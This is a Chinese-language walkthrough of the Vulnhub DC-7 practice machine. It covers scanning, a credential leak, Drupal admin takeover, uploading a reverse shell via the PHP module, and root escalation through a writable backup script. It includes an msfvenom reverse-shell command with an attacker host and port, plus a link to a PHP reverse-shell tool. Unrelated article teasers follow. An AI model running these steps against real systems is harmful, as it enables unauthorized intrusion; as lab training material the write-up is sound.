Vulnhub靶机DC系列-DC7
0x0:靶场介绍
靶场名称: DC: 7
靶场发布时间:2019-4-26
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
靶场描述:
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet
1x0:环境搭建
VMware虚拟机(桥接模式)
2x0:靶机渗透
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
install.mysql 403!
版本大致的判断:
kali去搜索一下drupal8版本的的漏洞(都利用失败了,看一下其他思路才知道需要去下载代码)
直接搜索@DC7USER即可
下载,代码审计 config.php 有数据库的配置信息(没有什么其他可以利用的点)
玄学登录SSH尝试下一把
牛皮。
有一份mbox 邮件
提供一个路径/opt/scripts/backups.sh
解开这个文件,也没什么用。
发现一个可以修改drupal的管理员密码的命令
回到网站去登录管理员账号
具体的版本号
这里需要反弹shell 利用上传插件 插件地址:https://www.drupal.org/project/php
上传插件
上传成功
勾选安装
上传反弹shell
在网上找到一个反向shell的php使用msf生成php_shell也可以
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.3.20 LPORT=1234 -f raw
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
下载下来,修改代码复制到文件中
修改一下既可(上传到页面保存就可以反弹出来)
3x0:提权篇
切换shell
发现backups.sh 具有root权限,但是在www-data组中 可以使用backups.sh 执行命令
直接写入反弹shell
等待连接即可
执行shell 等待连接
读取flag即可
相关文章
SaaS产品推广获客:单兵作战 vs 集群作战
编辑导语:SaaS处事企业不能仅仅提供软件,还能让客户购置软件之后可以或许用得起来。本日,本文作者从本身参加的项目推广事情中总结出的HR Saas产物的推广要领,并对SaaS产物推广获客推广渠道、各渠...
黑客论坛在哪里找(任天堂明星大乱斗黑客在哪里)
一、黑客论坛在哪里找(任天堂明星大乱斗黑客在哪里) 1、任天堂明星大乱斗小游戏隐藏人物怎么开启玩小游戏的自重(众:你不也在玩么!) 路易:用玛莉破冒险模式,难度要在普通以上 胖丁:用随便一人破冒险模...
茄子怎么做好吃(茄子最经典易做的12种做法)
茄子的做法有很多种多样,但最好吃的做法便是闷、蒸、烧及其拌凉菜。下列梳理了12道最經典,最美味并且容易做的茄子的做法,喜欢四季豆的你一定要个人收藏哦。1、肉末烧茄子原材料:长茄,肉沫1)四季豆清洗...
黑客萌妹(黑客萌宝很坑爹免费阅读)
主角叫陈峰的黑客系统小说 主角叫陈峰的黑客小说是《你成就黑客帝国陈峰》08年,正值扣扣飞车、地下城与勇士、穿越火线等一众网络游戏开服,企鹅凭借三款火爆游戏迅速崛起,以此打造商业帝国蓝图,但无数青少年却...
diy是什么意思?diy另外一种意思
DIY是在20世纪60年代起源于西方的概念,原本是意指不依赖或聘用专业的工匠,利用适当工具与材料自己来进行居家住宅的修缮工作。虽然起源不明而且可能是渐渐形成的概念,但通常提到DIY用语的兴起,常常会归...
暖气循环泵?暖气不热自己放水加循环泵?
集中供暖开始后,暖气热不热成了大家最关注的话题。尤其是听到同小区其他住户表示家里跟夏天一样,那些在家还需穿羽绒服的人就更坐不住了。 虽然《西安市集中供热条例》表明暖气在18℃是正常的,但更多的人...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!